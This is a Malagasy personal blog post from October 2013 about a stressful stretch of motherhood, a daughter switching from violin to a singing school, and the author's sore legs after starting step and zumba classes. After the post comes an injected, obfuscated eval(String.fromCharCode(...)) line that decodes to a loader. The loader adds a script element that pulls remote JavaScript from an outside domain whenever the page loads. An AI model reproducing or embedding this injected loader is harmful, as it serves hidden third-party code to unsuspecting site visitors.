Archive for Oktobra, 2013
Ny Fitaizana
Tsy hitako aiz any hanombohana izy ity fa dia sahirana nys aiko ato,
Efa nanoratra momba ny sakan-taona ihany aho teo aloha fa dia tena miha mafy izy ato e! tsy miantso vonjy akory hihihi satria dia izay moa ilay mitaiza e!
Asa koa moa fa ity faramparan’ny taona ity dia ohatran’ny mandalo “sedra” izany ny fiainako fa vitako io e! tsy misy mafy tsy laitran’ny zoto hoy ny fitenenana izay,
Raha eo @ lafin’ny fiainana an-davan’andro indray moa dia niova ny fomba fiainanay satria dia manjary tsy manao “mozika” intsony i Maeva fa vizana hono izy!!! izany hoe azavaiko kely sady vizana izy no koa tsy afaka mandray azy intsony ny sekoly nianarany taloha fa voatokana ho an’ny mpiara monina ao @ io faritra io ihany ny fianarana ao izany hoe raha mponina avy aty ivelan’ny faritra dia mahazo mianatra ao ihany fa ny saram-pianarana koa dia midangana be ka tsy takatry ny aiko ka dia naleo dia najanona izy, sady mmhh zarany rahateo koa aza moa fa nanomboka leo nilalao violon hono izy fa hirahira no tena tiany atao indray, dia rafitra teo indray ny fitadiavana sekoly maika ary soa fa nahita sekoly tsara sady mba azo atao hoe mirary ihany ny sandany izahay dia ny La Voix Lactée izany. vao nianatraandro voalohany aloha izy dia somary menatra ihany satria efa misy somary kalaza ihany ao @ ilay fianarany, dia tsy sahy nihira izy, (ahoana no nahafantarako hoe tsy sahy nihira izy?? hihihiih satria aho nihaino tao ambadiky ny varavarana fa tsy hainy aho hoe tao!!!)
Dia izaho indray moa dia tena vao² be amiko mihintsy fa lasa manao fanatanjahan-tena in droa isan-kerinandro aho izao, izany hoe miezaka aho mandeha in droa izany ao anatin’ny herinandro na fara faharatsiny dia indray isan-kerinandro manao zumba na manao step ihany koa, fa ny loza dia t@ nanao step voalohany aho dia nijafajafa ny anmpitso taorian’ny nanaovana azy io fa dia naharary tanteraka ny kibon-dranjoko, tsy nahatsiaro tena ho vizaka aho anefa fa dia ny kibon-dranjoko ihany no tena tsy tantiko, nalona tao anaty rano mangatsiaka sy mafanaa ary norina t@ diclofenac fa samy tsy nisy nandaitra ireo, fa dia mbola mijafajafa ihany roa andro izao.
Tapaka indray ny aingam-panahiko nanoratra fa nisy sofin-danitra somary elaela ihany teo fa dia tohizana @ manaraka indray
eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));-->
No comments